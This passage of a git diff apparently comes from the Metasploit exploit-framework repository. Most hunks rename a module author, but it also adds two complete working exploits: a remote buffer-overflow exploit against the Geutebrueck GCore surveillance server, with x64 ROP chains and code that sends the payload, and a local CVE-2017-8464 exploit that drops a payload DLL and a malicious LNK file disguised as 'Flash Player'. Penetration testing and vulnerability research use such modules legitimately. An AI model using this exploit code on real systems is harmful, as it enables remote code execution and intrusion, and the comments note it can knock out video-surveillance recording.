{ 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only. ], diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 4a77dae4ed..38643b7738 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote The flaw affects multiple platforms, however this module currently only supports Windows based installations. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'References' => [ [ 'CVE', '2006-3747' ], @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Automatic', {} ], # patrickw tested OK 20090310 win32 + [ 'Automatic', {} ], # aushack tested OK 20090310 win32 ], 'DisclosureDate' => 'Jul 28 2006', 'DefaultTarget' => 0)) @@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit # On Linux Apache, it is possible to overwrite EIP by - # sending ldap:// ... TODO patrickw + # sending ldap:// ... TODO aushack trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 16a5c8fb8a..415ef02818 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb new file mode 100644 index 0000000000..5328a095d0 --- /dev/null +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -0,0 +1,260 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'nokogiri' +require 'open-uri' + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::Tcp + + Rank = NormalRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', + 'Description' => %q{ + This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). + The vulnerable webserver is running on Port 13003 and Port 13004, does not require + authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Luca Cappiello', + 'Maurice Popp' + ], + 'References' => + [ + ['EDB','41153'], + ['CVE', '2017-11517'], + ['URL','www.geutebrueck.com'] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], + ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}], + ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}] + ], + 'Payload' => + { + 'Space' => '2000' + }, + 'Privileged' => true, + 'DisclosureDate' => 'Jan 24 2017', + 'DefaultTarget' => 0)) + + register_options( + [Opt::RPORT(13003)] + ) + end + + def fingerprint + print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...") + @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml")) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + end + end + print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.") + print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.') + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] + end + + def check + fingerprint + end + + def ropchain(target) + rop = '' + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 + + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') + + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404e5cbf: mov edx, esp ; ret + stack_align << [0x1404e5cbf].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align << [0x14013db94].pack('Q<') + stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align << [0x1407dc547].pack('Q<') + + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align << [0x140ce9ac0].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop << [0x140cc2234].pack('Q<') + rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop << [0x1400ae2ae].pack('Q<') + rop << [0x0000000000000400].pack('Q<') + + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop << [0x14029dc6e].pack('Q<') + rop << [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop << [0x1400aa030].pack('Q<') + rop << [0x1409AE1A8].pack('Q<') + + # 0x140b5927a: xor rax, rax ; ret + rop << [0x140b5927a].pack('Q<') + + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop << [0x1402ce220].pack('Q<') + rop << [0x140d752b8].pack('Q<') + + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop << [0x1407c6b3b].pack('Q<') + + # 0x140989c41 push rax; ret + rop << [0x140989c41].pack('Q<') + + # 0x1406d684d jmp rsp + rop << [0x1406d684d].pack('Q<') + + [rop, overwrite, stack_align] + + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') + + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404f213f: mov edx, esp ; ret + stack_align << [0x1404f213f].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align << [0x14000efa8].pack('Q<') + stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align << [0x140cdfe65].pack('Q<') + + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align << [0x140cf3110].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop << [0x140ccb984].pack('Q<') + rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop << [0x14008f7ec].pack('Q<') + rop << [0x0000000000000400].pack('Q<') + + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop << [0x140a88f81].pack('Q<') + rop << [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... + rop << [0x1400aa030].pack('Q<') + rop << [0x140FB5000].pack('Q<') + + # 0x140ccea2f: xor rax, rax ; et + rop << [0x140ccea2f].pack('Q<') + + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop << [0x14000efa8].pack('Q<') + rop << [0x140d83268].pack('Q<') + + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop << [0x14095b254].pack('Q<') + + # 0x140166c46 push rax; ret + rop << [0x140166c46].pack('Q<') + + # 0x140cfb98d jmp rsp + rop << [0x140cfb98d].pack('Q<') + + [rop, overwrite, stack_align] + + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + end + end + + def exploit + if target['auto'] + checkcode, target = fingerprint + fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' + target_rop, target_overwrite, target_stack_align = ropchain(target) + else + print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + end + + begin + connect + print_status('Crafting Exploit...') + exploit = 'GET /' + exploit << "\x41" * 200 + exploit << target_rop + exploit << payload.encoded + exploit << "\x41" * 1823 + exploit << target_overwrite + exploit << target_stack_align + + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}") + ensure + print_status('Closing socket.') + disconnect + end + end + end diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index de2bc48208..cde280d027 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote 'muts ', 'xbxice[at]yahoo.com', 'hdm', - 'patrick' # MSF3 rewrite, ePO v2.5.1 target + 'aushack' # MSF3 rewrite, ePO v2.5.1 target ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 6e2d330a1f..3bd9a08880 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['win'], 'Targets' => [ - # Patrickw - Tested OK-ish 20090702 w2k + # Aushack - Tested OK-ish 20090702 w2k [ 'Universal MDaemon.exe', { 'Ret' => 0x022fcd46 } ], # direct memory jump :( [ 'Debugging test', { 'Ret' => 0x44434241 } ], ], diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 612eae53d7..531044e687 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index 55442c2e0a..403a65471b 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', 'Andrew Griffiths ', - 'patrick', # msf3 port + 'aushack', # msf3 port ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 9225f81aea..03ee643d42 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 5f5ea78a9b..c8a20e5c1a 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ 'LSO ', # Original exploit module - 'patrick' # Added references and check code. Default target to XP. + 'aushack' # Added references and check code. Default target to XP. ], 'License' => BSD_LICENSE, 'References' => diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 4c89c20b47..1b08baab9a 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote the Microsoft Systems Journal in February 1996 titled "Write a Simple HTTP-based Server Using MFC and Windows Sockets". }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2002-2268' ], diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index a324b930cf..0c0fdd8874 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote execute a payload remotely. Due to size constraints, this module uses the Egghunter technique. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 77cc0768a0..d7d86800cb 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote the RDS DataStub 'Content-Type' string is overly long. Microsoft Data Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'Platform' => 'win', 'References' => [ @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ - # patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0 + # aushack tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0 [ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll ], 'DefaultTarget' => 0, diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 44c1b79239..8a2b21a780 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote and useful for debugging. Also set NAME to obtain the remote hostname, and METHOD to use the alternative VbBusObj technique. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'Platform' => 'win', 'References' => [ @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Targets' => [ - # patrickw tested meterpreter OK 20120601 + # aushack tested meterpreter OK 20120601 # nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx # w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp [ 'Automatic', { } ], diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 09e84297c5..f7eac8768d 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli }, - 'Author' => [ 'Jacopo Cervini', 'patrick' ], + 'Author' => [ 'Jacopo Cervini', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index f44d9df234..57ce6b7704 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index 20bccce385..c30ce6ec7a 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 48533a760f..8307bc591c 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', # original msf v2 module - 'patrick', # msf v3 port :) + 'aushack', # msf v3 port :) ], 'License' => MSF_LICENSE, 'References' => @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote # name, jmp esi, writable, jmp edi #['Automatic', {} ], # - # patrickw - tested OK Windows XP English SP0-1 only 20100214 + # aushack - tested OK Windows XP English SP0-1 only 20100214 ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index fefa2db5e5..c73b69a518 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', # original msf v2 module - 'patrick', # msf v3 port :) + 'aushack', # msf v3 port :) ], 'License' => MSF_LICENSE, 'References' => @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote # name, jmp esi, writable, jmp edi #['Automatic', {} ], # - # patrickw - tested OK Windows XP English SP0-1 only 20100214 + # aushack - tested OK Windows XP English SP0-1 only 20100214 ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb new file mode 100644 index 0000000000..6ca5c09d94 --- /dev/null +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -0,0 +1,208 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Windows::Priv + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'LNK Code Execution Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) + that contain a dynamic icon, loaded from a malicious DLL. + + This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is + similar except an additional SpecialFolderDataBlock is included. The folder ID set + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass + the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary + DLL file. + + The PATH option must be an absolute path to a writeable directory which is indexed for + searching. If no PATH is specified, the module defaults to %USERPROFILE%. + }, + 'Author' => + [ + 'Uncredited', # vulnerability discovery + 'Yorick Koster', # msf module + 'Spencer McIntyre' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-8464'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], + ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup + ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format + ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'], + ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'FileDropperDelay' => 15, + 'WfsDelay' => 30 + }, + 'Arch' => [ARCH_X86, ARCH_X64], + 'Payload' => + { + 'Space' => 2048 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows x86', { 'Arch' => ARCH_X86 } ] + ], + 'DefaultTarget' => 0, # Default target is Automatic + 'DisclosureDate' => 'Jun 13 2017' + ) + ) + + register_options( + [ + OptString.new('FILENAME', [false, 'The LNK file']), + OptString.new('DLLNAME', [false, 'The DLL file containing the payload']), + OptString.new('PATH', [false, 'An explicit path to where the files should be written to']) + ] + ) + + register_advanced_options( + [ + OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), + OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) + ] + ) + end + + def check + if session.sys.process['SearchIndexer.exe'] + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def get_name(option, default_ext) + name = datastore[option].to_s.strip + name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank? + name + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + + path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') + arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] + datastore['EXE::Path'] = path + datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") + + path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%") + path.chomp!("\\") + + dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}" + write_file(dll_path, generate_payload_dll) + + lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}" + write_file(lnk_path, generate_link(dll_path)) + register_files_for_cleanup(dll_path, lnk_path) + end + + def file_rm(file) + if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true) + @dropped_files.delete(file) + end + end + + def generate_link(path) + vprint_status("Generating LNK file to load: #{path}") + path += "\x00" # Do not use << here + display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name + comment = datastore['LnkComment'].dup << "\x00" + + # Control Panel Applet ItemID with our DLL + cpl_applet = [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00 + ].pack('C*') + cpl_applet << [path.length].pack('v') + cpl_applet << [display_name.length].pack('v') + cpl_applet << path.unpack('C*').pack('v*') + cpl_applet << display_name.unpack('C*').pack('v*') + cpl_applet << comment.unpack('C*').pack('v*') + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C + 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 + 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) + 0x00, 0x00, 0x00, 0x00, # FileAttributes + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime + 0x00, 0x00, 0x00, 0x00, # FileSize + 0x00, 0x00, 0x00, 0x00, # IconIndex + 0x00, 0x00, 0x00, 0x00, # ShowCommand + 0x00, 0x00, # HotKey + 0x00, 0x00, # Reserved1 + 0x00, 0x00, 0x00, 0x00, # Reserved2 + 0x00, 0x00, 0x00, 0x00 # Reserved3 + ].pack('C*') + + # IDList + idlist_data = '' + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + # All Control Panel Items + 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [cpl_applet.length + 2].pack('v') + idlist_data << cpl_applet + idlist_data << [0x00].pack('v') # TerminalID + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData + # SpecialFolderDataBlock + ret << [ + 0x10, 0x00, 0x00, 0x00, # BlockSize + 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 + 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel) + 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList + ].pack('C*') + # TerminalBlock + ret << [0x00, 0x00, 0x00, 0x00].pack('V') + ret + end +end diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index f195409a4f..c1152c0670 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local # Validate OS version winver = sysinfo["OS"] - unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/ + unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/ return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index 18b58de464..fe21cba6fd 100644 --- 